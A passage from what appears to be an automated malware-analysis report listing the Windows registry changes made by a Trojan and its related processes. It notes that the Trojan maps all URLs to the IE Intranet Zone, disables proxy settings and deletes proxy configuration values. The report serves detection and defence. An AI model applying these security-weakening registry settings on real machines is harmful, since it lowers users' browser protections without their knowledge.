"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 99 50 CC B8 CB D3 3C 05 16 D9 31 F4 52 6C 41"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process MM-liao8398.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122020141221\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv083_98.exe" = "9158chat2_ktv083_98"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8398.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1413899698"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 6B FF E9 5E C7 46 CA A3 F0 95 F2 A6 F6 F2"
[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePrefix" = ":2014122020141221:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 61 03 27 91 D4 87 08 8F D0 65 E9 A4 53 D3 B0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process notify.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\PPTAssist\Common\minisite]
"Address" = "ZmlsZTovLy8lYXBwcm9vdCVcbWluaXNpdGVcMS4wXGluZGV4Lmh0bWw="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\PPTAssist\Common\minisite]
"timebucket" = "11:40:00-14:00:00,17:20:00-20:00:00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\PPTAssist\Common\updateinfo]
"notifysettingetag" = "7139DDC4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\PPTAssist\Common\minisite]
"idleContinueSecond" = "240"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\PPTAssist\Common\minisite]
"switch" = "3"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\PPTAssist\Common\updateinfo]
"LastNotifyTime" = "2014-12-20 02:06:01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 8F 8B DD D8 B7 00 AD B7 AF B7 4D ED 37 0F 60"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\PPTAssist\Common\updateinfo]
"LastKsoActive" = "2014-12-20 02:06:14"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9158chat2_ktv083_98.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"
[HKLM\SOFTWARE\9158web]
"StartTime" = "12200205"
[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\9158Service]
"LastPlat" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"DisplayVersion" = "6.800"
"DisplayName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 3E D3 F3 BC 60 64 40 BE D6 DD 2F FF EA 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "天格科技（杭州）有限公司"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"URLInfoAbout" = "http://www.9158.com/"
The process assistupdate.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 E4 04 70 F5 F4 A5 52 A4 52 43 B8 76 1E A2 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process dts.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 D1 B0 B4 A5 07 55 FF 8A 3C B5 8F 6B E8 79 72"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dts.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 27 A4 56 D5 0B BD EF 0C 01 85 38 9E 40 7D 22"
The process dts.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 84 70 76 50 17 53 A0 4E 4A 95 5F FB 3C 7D 36"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
